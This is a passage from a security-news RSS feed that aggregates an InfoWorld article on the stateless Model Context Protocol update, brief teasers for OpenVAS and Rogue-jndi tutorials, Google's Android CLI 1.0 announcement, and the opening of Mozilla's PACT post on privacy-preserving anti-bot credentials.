<p class="wp-block-paragraph">This transition to a stateless design goes beyond simplifying infrastructure by fundamentally changing how AI applications manage and share context across tools, according to <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">Instead of keeping application state hidden inside protocol sessions, the new design makes it explicit, allowing AI models to access, reason over, and pass that information between tools, giving developers greater control over how context is preserved and shared across tools, Jena said.</p>



<p class="wp-block-paragraph">It should also make AI workflows more portable, resilient, and easier to orchestrate across distributed environments, he said.</p>



<h2 class="wp-block-heading">MCP’s new features</h2>



<p class="wp-block-paragraph">Other changes to MCP include the addition of a Multi Round-Trip Requests (MRTR) mechanism that changes how AI agents request additional information they need to complete a task.</p>



<p class="wp-block-paragraph">Instead of relying on a persistent connection between the client and server throughout the interaction, the new mechanism lets the server request additional input through a standard request-response exchange before continuing the task, Jena said.</p>



<p class="wp-block-paragraph">Routable transport headers, another addition, enable API gateways and other networking infrastructure to identify and route MCP requests without inspecting their contents.</p>



<p class="wp-block-paragraph">They reduce processing overhead, lower latency, and let enterprise teams enforce routing, rate-limiting and security policies more efficiently using existing API management infrastructure, Jena said.</p>



<p class="wp-block-paragraph">MCP is also getting an updated authorization framework built around OAuth 2.1 and OpenID Connect; interactive MCP Apps; and deterministic caching of tool and resource listings to improve LLM prompt-cache hit rates, potentially saving on token costs.</p>



<h2 class="wp-block-heading">Rebuilding the trust boundary</h2>



<p class="wp-block-paragraph">The MCP release steering committee also decided to deprecate some legacy features, including Roots, Sampling, Logging, the older HTTP+SSE transport and Dynamic Client Registration, although these will continue to work in this version and any other released over the next year.</p>



<p class="wp-block-paragraph">The deprecation of Sampling is likely to have the biggest impact because it changes who is responsible for interacting with foundation models, said Jena.</p>



<p class="wp-block-paragraph">“Sampling let MCP servers invoke the <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" target="_blank">LLM</a> through the client, which meant the server had a callback path into the model without owning that connection. Deprecating it means rebuilding that trust boundary,” Jena said. “Your server now calls the model provider directly. That changes your network architecture, your auth model, and depending on how you’ve built cost attribution, your billing flow.”</p>



<p class="wp-block-paragraph">The year-long transition period will be enough for teams to audit their sampling dependencies now, said Jena: “The risk is that teams who haven’t implemented sampling themselves won’t know if a third-party MCP server they’re depending on uses it.”</p>



<h2 class="wp-block-heading">Updated MCP SDKs</h2>



<p class="wp-block-paragraph">To accompany the protocol update, there are updated <a href="https://github.com/modelcontextprotocol" target="_blank" rel="noreferrer noopener">MCP SDKs</a> for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html" target="_blank">Python</a>, <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" target="_blank">Typescript</a>, <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>, and <a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>. These support both the old and new protocol versions, so new clients can continue communicating with older servers, while updated servers will also support older clients, reducing the risk of immediate disruptions.</p>



<p class="wp-block-paragraph">That backward compatibility should make the transition largely incremental, except for enterprises that built custom infrastructure around MCP’s earlier session-based architecture, Bandta said.</p>



<p class="wp-block-paragraph">Identifying and auditing those session dependencies may not be easy, Jena warned.</p>



<p class="wp-block-paragraph">“Session management complexity tends to be hidden across multiple layers — the gateway config, the deployment scripts, the monitoring dashboards. The code change is small; finding everywhere the assumption lives is what takes time,” he said.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4201254/model-context-protocol-is-going-stateless-to-make-scaling-simpler.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning]]></title>
<description><![CDATA[Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we’ve gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we’v...]]></description>
<link>https://tsecurity.de/de/3694244/it-security-nachrichten/vulnerability-scanning-with-openvas-9-part-2-vulnerability-scanning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694244/it-security-nachrichten/vulnerability-scanning-with-openvas-9-part-2-vulnerability-scanning/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we’ve gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we’ve also installed a virtual machine with Metasploitable 2 [...]</p>
<p>The post <a href="https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/">Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning</a> appeared first on <a href="https://www.hackingtutorials.org/">Hacking Tutorials</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup]]></title>
<description><![CDATA[A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this t...]]></description>
<link>https://tsecurity.de/de/3694245/it-security-nachrichten/vulnerability-scanning-with-openvas-9-part-1-installation-setup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694245/it-security-nachrichten/vulnerability-scanning-with-openvas-9-part-1-installation-setup/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...]</p>
<p>The post <a href="https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/">Vulnerability Scanning with OpenVAS 9 part 1: Installation &amp; Setup</a> appeared first on <a href="https://www.hackingtutorials.org/">Hacking Tutorials</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Installing Rogue-jndi on Kali Linux]]></title>
<description><![CDATA[Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example)...]]></description>
<link>https://tsecurity.de/de/3694238/it-security-nachrichten/installing-rogue-jndi-on-kali-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694238/it-security-nachrichten/installing-rogue-jndi-on-kali-linux/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]</p>
<p>The post <a href="https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/">Installing Rogue-jndi on Kali Linux</a> appeared first on <a href="https://www.hackingtutorials.org/">Hacking Tutorials</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android CLI Now Stable 1.0: Accelerate developing for Android using any agent]]></title>
<description><![CDATA[Posted by Simona Milanovic and Ben Trengrove, Developer Relations Engineers
As Android developers, you have many choices when it comes to the agents, tools, command-line interfaces (CLI), and LLMs you use for app development. Whether you use Gemini in Android Studio,  Antigravity 2.0, Antigravity...]]></description>
<link>https://tsecurity.de/de/3693514/android-tipps/android-cli-now-stable-10-accelerate-developing-for-android-using-any-agent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693514/android-tipps/android-cli-now-stable-10-accelerate-developing-for-android-using-any-agent/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:49 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVLU7gkfsf4axphzvtOKcqEkI3MLKZqX6Y9jGVReW6Ximz61c8klVVc0_Xs5Fw_aqk5yjl3K-Mit6cyKq0SLOJbUhUZ7R3dZZcwShqn5jYp-DuHY8hNoBWHJkicoIJ9DKRINQt6seAB3s2mcwANFYX9k0scYyCgfIYQrof7ImxOvzEW7BNj0ZPwEGB5FI/s2048/GoogleForDevelopers-AndroidCombo3-StrapiMetacard-2048x1323%20(1).png">





<div><div class="separator"><i>Posted by Simona Milanovic and Ben Trengrove, Developer Relations Engineers</i><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-DNQCYynOZTPwB7Two8HSejPtcinJWir0-t4Wseo9MFHwLNeluQqIbf-9XDJXcSTaHBoX7NJ6oTFRUczPaokekC-oFEFgdZwxngaskLaxyqCGy5-ZbT0QAnmRafTvx3PKPaMo-npHZuwUAi84AW-28rWw6_2BTWHnXoXqbSrX6Kboz0fy5lz9YogDFf0/s4209/GoogleForDevelopers-AndroidCombo3-Blogger-4209x1253.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-DNQCYynOZTPwB7Two8HSejPtcinJWir0-t4Wseo9MFHwLNeluQqIbf-9XDJXcSTaHBoX7NJ6oTFRUczPaokekC-oFEFgdZwxngaskLaxyqCGy5-ZbT0QAnmRafTvx3PKPaMo-npHZuwUAi84AW-28rWw6_2BTWHnXoXqbSrX6Kboz0fy5lz9YogDFf0/s16000/GoogleForDevelopers-AndroidCombo3-Blogger-4209x1253.png"></a></div></div><div><br></div><div>
As Android developers, you have many choices when it comes to the agents, tools, command-line interfaces (CLI), and LLMs you use for app development. Whether you use Gemini in Android Studio,  Antigravity 2.0, Antigravity CLI, or third-party agents like Anthropic's Claude Code or OpenAI'sCodex, our mission remains the same: to ensure that high-quality Android development is possible everywhere.

  <p><span></span></p>
<p><span></span></p>
<div class="separator">
    <div>
        </div></div>
<p></p>

  <p>At <b>Google I/O ‘26</b>, we shared the latest leaps forward in agentic development, and showcased some of the newest capabilities of <a href="https://developer.android.com/tools/agents/android-cli">Android CLI</a>—now stable at version 1.0 and ready for all Android developers to use. From new skills to enabling agent access to powerful Android Studio capabilities, we’re giving your agents the right tools to build alongside you.</p>

  <div>If you’re already using Android CLI and want to jump into using all the new features, just run <span><code>android update<code></code></code></span>. Otherwise, read further to learn more about how we’re making the agents you choose be better at building for Android.</div>

  <h3>Android development unlocked for Antigravity</h3>
  <p><a href="https://antigravity.google/">Google Antigravity</a> now includes an optional bundle of Android resources—including the Android CLI and skills—that you can install. You can either install the bundle during onboarding after installation, or later from the <b>Settings &gt; Customizations &gt; Build With Google Plugins</b> menu.</p><p>This provides Antigravity with all the powerful tools and knowledge of Android CLI, enabling it to perform the core tasks necessary for Android app development more easily and efficiently—from creating projects to deploying your app on a new Android virtual device.</p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivI2fhgZRJRpz8TXcX4OC2CALzgOfHhKyVmVG0IaMsibqaAUVbZORx-5fbVrYUKlp0Fl1qk1wZ02jbrYSfFGRCtOvnOzWWYdw8G3or9ul_QY2yvT6Wm-kEIjAJtfj75kNWlSswAqoUCLvSefnFY3JMw7NQOA8hkDn3nc232oyEK1VN5ZM_UHbAEJWolWE/s16000/agy-android-cli%20(1).png"></div><i><div><i>You can now easily install Android CLI for use with Google Antigravity 2.0.</i></div></i><h3>Unlocking Android Studio capabilities for any agent</h3><p>Android CLI provides a lightweight interface for AI Agents to perform tasks and retrieve knowledge about Android development. However, there's benefits to specialization — Android Studio contains over a decade of Android expertise, built to handle even the most complex Android projects. This includes Android Studio's powerful static analysis engine, refactoring tools, dependency management, UI design and rendering libraries, and more. AI Agents can now tap into Android Studio's tools to gain many of these same capabilities.</p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRp6RfqiD9adFdIQS9Fm_a3p_5X6K5Fjo5rEQhOeOqFpvjlQ-04DHav5atkLF7IZvnpdMaQqG_oBAhmcvCPRtAvsW7AH0Q3VF18y-TBUITLXBglNbR2o99sC-hJgj_D-OhF51rLO_OYi1RXdm6GBfgZqfsTdQa1CY6_g10D2LwLun3S1CjfqOY2pqp02Y/s16000/agy-android-studio%20(1).png"></div><div><i>Your agents can now use Android CLI to access powerful capabilities of Android Studio.</i></div><p>The latest version of Android CLI introduces the new <code>android studio</code> command. This enables the agent of your choice to leverage the deep, contextual capabilities of Android Studio to better understand and perform actions on an open Android project. By running Android Studio alongside your preferred agent with Android CLI, your agent’s tasks can more efficiently navigate the codebase to produce more precise code changes. And, when you use Android CLI to create and iterate on your project, transitioning to Android Studio is much easier, so that you can use the purpose built tools—such as, performance profilers, Compose Previews, and Android Device Streaming—to get that production-grade polish.</p>

  <p>When you have a project open in the latest <a href="https://developer.android.com/studio/preview">preview version</a> of Android Studio Quail, you (or your agent) can run the following command to check whether Android CLI has a connection established with your open project:</p>

<pre><span><p dir="ltr"><span>$ android studio check</span></p><p dir="ltr"><span>pid: </span><span>32942</span></p><p dir="ltr"><span>version: </span><span>Android Studio</span></p><p dir="ltr"><span>Projects:</span></p><span>    </span><span>READY</span><span>     JetSet /Users/adarshf/AndroidStudioProjects/jetset-main</span></span></pre>

  <p>From there, the agents can use the <code>android studio</code> command to access powerful IDE tools to interact with projects more efficiently. Key commands include:</p><p></p><ul><li><b>analyze-file:</b> Analyzes a file for errors and warnings using the editor's built-in inspections.</li><li><b>find-declaration:</b> Finds the exact definition site of a symbol (class, method, variable, field, constant, or Android resource/color) across the project using semantic resolution.</li><li><b>find-usages: </b>Finds all references and declarations of a symbol (class, method, variable, or Android resource) across the entire project using semantic analysis.</li><li><b>render-compose-preview: </b>Renders a Jetpack Compose UI Preview and returns a path to the image and UI hierarchy if successful.</li><li><b>version-lookup:</b> Get the latest information about which versions for specified app dependencies are available in common repositories, such as the Google Maven repository. By providing a programmatic solution, dependency management is less tedious and much less prone to flakiness.</li><li><b>open-file: </b>Opens a file directly in Android Studio. This is useful if the agent wants to direct your attention to view Compose Previews, performance traces, or other specific files in the IDE.</li></ul><p></p><ul>
  </ul>

  <p>For example, agents can now run the following commands to render a Compose preview for a new layout for your Android app, and then open the previews in Android Studio for you to take advantage of seeing multiple Compose Previews side by side and make AI-assisted edits right from the IDE.</p>

<pre><span><p dir="ltr"><span>$ android studio </span><span>find-declaration</span><span> HotelDetailScreen</span></p><p dir="ltr"><span>$ android studio </span><span>analyze-file</span><span> .../JetPacker/feature/detail/src/main/java/com/example/jetset/feature/detail/HotelDetailScreen.kt</span></p><span>$ android studio </span><span>open-file</span><span> feature/detail/src/main/java/com/example/jetset/feature/detail/HotelDetailScreen.kt</span></span></pre>

  <p>To learn more about how to use these commands, run <code>android help</code>. And, to make sure your agents understand how to work with this tool, make sure to update the Android CLI skill by running <code>android init</code>.</p>

  <h3>More ways to get started</h3>
  <p>To make integrating Android CLI into your environments as seamless as possible, we’re making it available in more ways. You can now download and install Android CLI using more package managers: apt-get, winget, and homebrew. For example, you can run the following to install Android CLI using winget:</p>

  <pre>winget install -e --id Google.AndroidCLI</pre>

  <p>We’ve also updated the installation to a user-local directory, by default. You can find the commands for all supported operating systems plus additional download options on the <a href="https://developer.android.com/tools/agents/android-cli/archive">Android CLI page</a>.</p>

  <h3>Support for Journeys</h3>
  <div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip7lO5BVjTIeJXDWyrGOdl4KpPTo8_oEcf0qLFUBRfPgOazlG7C9eLWDLdnNYb68-rlon4uOE4qo62WC_U7SaAOYwLG3Vbr0v_lRsh-iNoPzVMmFbAgKXXN1hz9Qj7rMImyybqHCU34ryMlml2fCquAyfNgp1yWiZu-CsP1Jowx4o0z69_wkNtYR0GQIM/s16000/android-cli-write-journey.png"></div><div><i>Journeys are natural language descriptions of core user experiences.</i></div><div><span><span><br></span></span></div>We are also introducing support for <a href="https://developer.android.com/tools/agents/android-cli/journeys">Journeys</a>. With Journeys tools and skills included with Android CLI, any agent of your choice can now create and run Journeys—which are natural language descriptions of user journeys for your app that are saved directly to your project.</div><div> <div class="separator"><img border="0" data-original-height="576" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeAW4kjqfV1t_mAw_iYwgWSczw3q-h3VEOAuDAe12uBel0niX6M2KAoGrs6M2UHhT3t1GvBZs-c3w0R87W6HgCAzHQZOdFjixUHyYCZRzhOgB_RtOkVh0Ph8cDFki0sWI8i5CFNXxGxBHai0uh0RZw5E9kcJUvl8DJtPT3tnkaQm5r8UHuWMstopnTnnI/s16000/android-cli-journey-run.gif"></div><p><i>(sped up) An agent running a Journey it generated for an app.</i></p>Agents can run these journeys using the Android CLI to navigate your app exactly like a user would. This unlocks entirely new ways to test, validate, or collect data across the critical experiences of your app, all driven by natural language and executed by your agent.
  
  <h3>Expanding Android skills</h3>
  <p>To help models better understand and execute specific patterns that follow our best practices, we are continuing to expand our <a href="https://github.com/android/skills">library of Android skills</a>. We’re shipping new skills that make Android development everywhere more capable, efficient, and productive:</p><p></p><ul><li><b>Display Glasses and Jetpack Compose Glimmer for XR: </b>Provides guidelines for developing projected applications for Android Display Glasses using the Jetpack Compose Glimmer UI toolkit.</li><li><b>Migration to CameraX:</b> Helps you migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.</li><li><b>Perfetto SQL:</b> Translates natural language data prompts into Perfetto SQL queries and executes them against a local trace file.</li><li><b>Adaptive UI:</b> Instructions to make or update an app's UI so that it adapts to different Android devices</li><li><b>Testing setup: </b>Creates a basic testing strategy.</li><li><b>Styles:</b> Helps with adoption of the new Jetpack Compose Style API for new components, and supports migration to Styles API. </li><li><b>AppFunctions: </b>Analyzes Android codebases to recommend and implement new AppFunctions, and refines KDoc documentation for Model Context Protocol optimization.</li></ul><p></p><p>You can add these new skills to your workflow directly from the command line. To help your agents understand and use Android CLI right away, you can initialize your environment and install the base android-cli skill by running:</p>
<pre>android init
</pre>
  <p>From there, you can browse and set up your agent workflow by searching for the exact capabilities your agent needs:</p>
<pre>android skills list
</pre>
  <p>Once you've found the right skill, install it to your environment by running:</p>
<pre>android skills add –skill=&lt;skill-name&gt;
</pre>
  
  <h3>Get started today</h3>
  <p>To download the stable 1.0 release of the Android CLI, explore the new tools, and browse the complete documentation, head over to <a href="https://d.android.com/tools/agents">d.android.com/tools/agents</a> today!  Also, make sure you update to the <a href="https://developer.android.com/studio/preview">latest preview version of Android Studio</a> to unlock the latest features that Android CLI offers. We can't wait to see what you build with Android CLI 1.0 and how these new features supercharge your daily workflows. Join our vibrant community on <a href="https://www.linkedin.com/showcase/androiddev/posts/?feedView=all">LinkedIn</a>, <a href="https://medium.com/androiddevelopers">Medium</a>, <a href="https://www.youtube.com/c/AndroidDevelopers/videos">YouTube</a>, or <a href="https://twitter.com/androidstudio">X</a> and  share your feedback.</p><p>Explore this announcement and all Google I/O 2026 updates on <a href="https://io.google/2026/?utm_source=blogpost&amp;utm_medium=pr&amp;utm_campaign=devblogs&amp;utm_content=">io.google.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacks.Mozilla.Org: PACT: Anonymous Credentials for the Web]]></title>
<description><![CDATA[This is the technical companion to our update on Distilled, “Keeping the web open and private in the bot era.” Here we take a deeper look at the problem space, the design we’re proposing, and the problems still left to solve. 
Bots (and privacy-preserving browsers) not welcome 
Browse a news site...]]></description>
<link>https://tsecurity.de/de/3693291/tools/hacksmozillaorg-pact-anonymous-credentials-for-the-web/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693291/tools/hacksmozillaorg-pact-anonymous-credentials-for-the-web/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="c43"><em><span class="c11 c1">This is the technical companion to our update on Distilled, </span><span class="c11 c1 c17"><a class="c5" href="https://blog.mozilla.org/en/privacy-security/keeping-the-web-open-and-private-in-the-bot-era/">“Keeping the web open and private in the bot era.”</a></span><span class="c11 c1"> Here we take a deeper look at the problem space, the design we’re proposing, and the problems still left to </span><span class="c1 c11">solve</span></em><span class="c13 c11 c1"><em>.</em> </span></p>
<h3 class="c24"><span class="c2 c1">Bots (and privacy-preserving browsers) not welcome </span></h3>
<p class="c40"><span class="c0">Browse a news site in a private window. Shop at a major retailer with a VPN. Visit a video streaming platform with anti-fingerprinting defenses tuned up. You’ll see the same responses: registration walls, block pages, and endless CAPTCHAs. The message is clear: </span><span class="c13 c11 c1">if we think you might be a bot, you’re not welcome</span><span class="c0">. </span></p>
<p class="c53"><span class="c0">Websites have valid reasons for wanting to block bots. Bots enable volumetric abuse</span><span class="c1">, abuse that wouldn’t otherwise be feasible if they had to be carried out by humans</span><span class="c0">. </span><span class="c0"> For example</span><span class="c1">: SEO comment spam, credential stuffing and DDoSing</span><span class="c0">.</span><span class="c0"> Consequently many sites employ dedicated anti-abuse tooling which aims to keep the bots out whilst minimizing friction for human visitors. </span></p>
<p class="c21"><span class="c0">Unfortunately, that tooling is increasingly failing at both tasks. Browser privacy protections are </span><span class="c3 c1"><a class="c5" href="https://blog.mozilla.org/en/firefox/fingerprinting-protections/">dismantling</a></span><span class="c0"> the passive signals that anti-abuse systems depended on to identify and distinguish </span><span class="c0">visitors</span><span class="c0">. Meanwhile advances in generative AI have rendered CAPTCHAs ineffective: bots now solve them </span><span class="c3 c1"><a class="c5" href="https://www.usenix.org/system/files/usenixsecurity23-searles.pdf">faster and more reliably</a></span><span class="c0"> than </span><span class="c0">humans</span><span class="c0">. </span></p>
<p class="c33"><span class="c0">Many sites are switching to more invasive mechanisms and now ask visitors to disclose </span><span class="c1">identifying information</span><span class="c0">,</span><span class="c0"> e.g. an email address, a federated login or </span><span class="c1">disabling their VPN</span><span class="c0">. This means greater friction for users, since providing these details on a first visit takes time. It also compromises their privacy, since these details enable the same kinds of cross-site tracking that browser privacy protections were intended to mitigate. </span></p>
<p class="c38"><span class="c0">This </span><span class="c1">leaves</span><span class="c0"> users </span><span class="c1">with a</span><span class="c0"> dilemma. The more effectively they protect their privacy, the harder it is for websites to distinguish them from bots and the worse the treatment they receive. Website operators are also suffering. The additional friction they inflict upon well-behaved visitors harms their site, but many are willing to pay the costs if it mitigates volumetric abuse. </span></p>
<p class="c44"><span class="c1">Browser-based AI agents make this tension more acute. Sites may want to allow agents which are acting on behalf of individual users while blocking agents engaged in volumetric abuse. However, with no effective mechanisms to distinguish the two, websites are opting to block </span><span class="c17 c1"><a class="c5" href="https://dl.acm.org/doi/epdf/10.1145/3730567.3732913">both</a></span><span class="c0">. That hurts users, who should be free to choose the user agent they use to access the web; it hurts new browsers and agents, which struggle to interoperate; and it hurts sites, which lose legitimate visitors.</span></p>
<p class="c30"><span class="c0">The consequence is that the web gets worse for everyone. Users get more friction or less privacy or both. Website operators see more volumetric abuse and the friction they add drives away users </span><span class="c1">who</span><span class="c0"> would otherwise want to consume their content or services. New user</span><span class="c1"> </span><span class="c0">agents struggle to access the same content as conventional browsers. </span></p>
<h3 class="c12"><span class="c20 c1">The</span><span class="c20 c1"> Costs of </span><span class="c2 c1">Convenient</span><span class="c2 c1"> Solutions</span></h3>
<p class="c9"><span class="c0">Some large ecosystem players have put forward solutions that leverage their control of the dominant operating systems and their deep integration with consumer hardware. These rely on device attestation: identifiers and privileged code baked into devices at the hardware level, which let manufacturers prove what software is running on a user’s device. Exposing this functionality to the web means attesting to sites that the user is running approved software with trusted hardware and therefore isn’t a bot. There have been two substantive proposals.</span></p>
<p class="c9"><span class="c0">Google’s Web Environment Integrity, <a href="https://www.theregister.com/software/2023/11/02/google-abandons-web-environment-integrity-api-proposal/335969">abandoned in 2023</a>, was the blunt version. It attested to the user agent itself, as well as the operating system and device in use. Users would have lost control in two ways: once to the attester, which would decide which operating systems and devices could be blessed, and again to the website, which would decide which software to accept. If sites had adopted allow-lists of approved user agents, building a new browser would have become virtually impossible, and sites could have withdrawn access from any user agent they chose.</span></p>
<p class="c9"><span class="c0">Apple’s Private Access Tokens, <a href="https://developer.apple.com/news/?id=huqjyh7k">deployed</a> across their ecosystem in 2022, have more subtle issues. Built on the Privacy Pass protocol standardized at the IETF, they get a lot right: a user receives a renewed, limited batch of one-time tokens that can be presented to websites without linking their visits together. This provides privacy for users and has shown rate limits to be an effective tool for sites – both points we’ll return to later in this post.</span></p>
<p class="c9"><span class="c1">However, Private Access Tokens rely on device attestation, requiring that the hardware manufacturer be in overall control of the user’s device. Presenting a PAT tells a website you are locked into Apple’s rules for what counts as acceptable software. </span><span class="c1">Due to PAT’s technical design</span><sup class="c1"><a href="https://hacks.mozilla.org/?p=48374#:~:text=PAT%20requires">[1]</a></sup><span class="c1">, there’s no way to open the system to other sources of scarcity without compromising the system’s privacy properties, meaning that if more widely deployed, access to the web would</span><span class="c1"> become tied to having bought expensive hardware from a small, hard to change set of vendors</span><span class="c1">. </span></p>
<p class="c9"><span class="c1">Both approaches are ultimately hostile to users and to the openness of the web. Both are premised on parts of a user’s device that sit within the manufacturer’s control and beyond the user’s own. Were they widely deployed, the web would become just another walled garden with centralized gatekeepers controlling acceptable hardware, operating systems and software. As convenient as these solutions are for the players who already dominate the ecosystem, we think there’s a better path.</span></p>
<h3 class="c24"><span class="c2 c1">A Better Path Forward </span></h3>
<p class="c24"><span class="c1">Bots’ harms arise from their ability to operate beyond human scale. For sites to prevent volumetric abuse they</span><span class="c0"> don’t actually need to know </span><span class="c1">the user’s</span><span class="c0"> identity or </span><span class="c1">receive cryptographic</span><span class="c0"> proof that they’re running approved softwar</span><span class="c1">e. If sites knew their visitors were restricted to a rate </span><span class="c1">limit</span><span class="c1"> set by a site, that would be enough.  </span></p>
<p class="c34"><span class="c1">Rate limits</span><span class="c0"> only make sense if </span><span class="c1">they’re</span><span class="c0"> </span><span class="c1">tied to</span><span class="c0"> something scarce; something an attacker can’t cheaply replicate to evade the limit. </span><span class="c0">Without anchoring to a scarce resource, like the trusted hardware used in Private Access Tokens, attackers can generate as many fresh identities as they need to bypass the rate limit. </span></p>
<p class="c56"><span class="c1">However, </span><span class="c0">hardware is just one option for </span><span class="c1">scarcity</span><span class="c0">. Anything a user already has that an attacker can’t trivially spin up at scale will work</span><span class="c1">: e</span><span class="c0">mail addresses and phone numbers are naturally scarce</span><span class="c1">. A paid subscription costs an attacker the same as a real user.  </span><span class="c0">Even maintaining an account on a free service requires </span><span class="c1">some</span><span class="c0"> non-trivial work. </span></p>
<p class="c39"><span class="c0">What if we could use these scarce signals across the web? We</span><span class="c1"> could build </span><span class="c0">an open ecosystem with many parties offering scarcity signals, each site choosing which to accept. By </span><span class="c0">opening up who can provide a signal, and letting sites choose which to accept, we can avoid transferring control to device manufacturers and the resulting harms. </span></p>
<p class="c39"><span class="c1">As a concrete example of who might be well positioned to provide such a signal, we can consider VPN providers acting as a subscription service. Sites routinely block VPN users indiscriminately, whether through a deliberate policy choice or through an indirect consequence of rate limiting visitors per IP address. But a VPN subscription is a perfect source of scarcity. If the VPN provider could vouch for its users so that sites could rate limit each user individually – then users would be able to browse the web with less friction and without giving up their VPN usage. </span></p>
<p class="c35"><span class="c0">The catch is that building </span><span class="c1">a system that can enable this</span><span class="c0"> on the open web whilst </span><span class="c1">maintaining user’s privacy</span><span class="c0"> is genuinely difficult. </span><span class="c1">It requires that we take information from one site — that this user holds some scarce thing — and expose it to other sites so that they can use that as the basis for their rate limiting. </span><span class="c0">Letting one site verify a signal from another is </span><span class="c1">the sort of </span><span class="c0">information flow</span><span class="c1"> </span><span class="c0">that privacy-pr</span><span class="c1">eserving </span><span class="c0">browsers have spent the last decade locking down to </span><span class="c1">prevent cross-site tracking</span><span class="c0">. </span></p>
<p class="c35"><span class="c1">Our goal would be that no more than the minimum information gets through: a single bit communicating whether the user is below the rate limit set by the site. Leaking anything more – like the source of the scarcity that the rate limit is anchored to – would be unacceptable. Enabling a new cross-site information flow might feel like compromising privacy to gain better access, but reality is more nuanced. If a new system moves sites away from demanding that visitors be identifiable (whether through fingerprinting or login forms), </span><span class="c1">it can be a win for both privacy and access.</span></p>
<h3 class="c24"><span class="c2 c1">The Foundations </span></h3>
<p class="c50"><span class="c0">The good news is that the cryptographic foundations for a privacy preserving approach already exist. The </span><span class="c1 c3"><a class="c5" href="https://privacypass.github.io/">Privacy Pass protocol</a></span><span class="c3 c1"><a class="c5" href="https://www.google.com/url?q=https://privacypass.github.io/&amp;sa=D&amp;source=editors&amp;ust=1782228494401139&amp;usg=AOvVaw3uoXdqARBZKjQF5H8uwYKY">,</a></span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://www.petsymposium.org/2018/files/papers/issue3/popets-2018-0026.pdf">originally developed in 2018</a></span><span class="c0"> to reduce the friction of Cloudflare CAPTCHAs for Tor users, introduced the core primitive: a token that is </span><span class="c13 c11 c1">unlinkable </span><span class="c0">between issuance and redemption. You prove something to an issuer (e.g. by </span><span class="c1">solving a CAPTCHA</span><span class="c0">), receive some tokens, and later present a token to a website. The website can verify the token is legitimate, but can’t link it to the user it was issued to. </span></p>
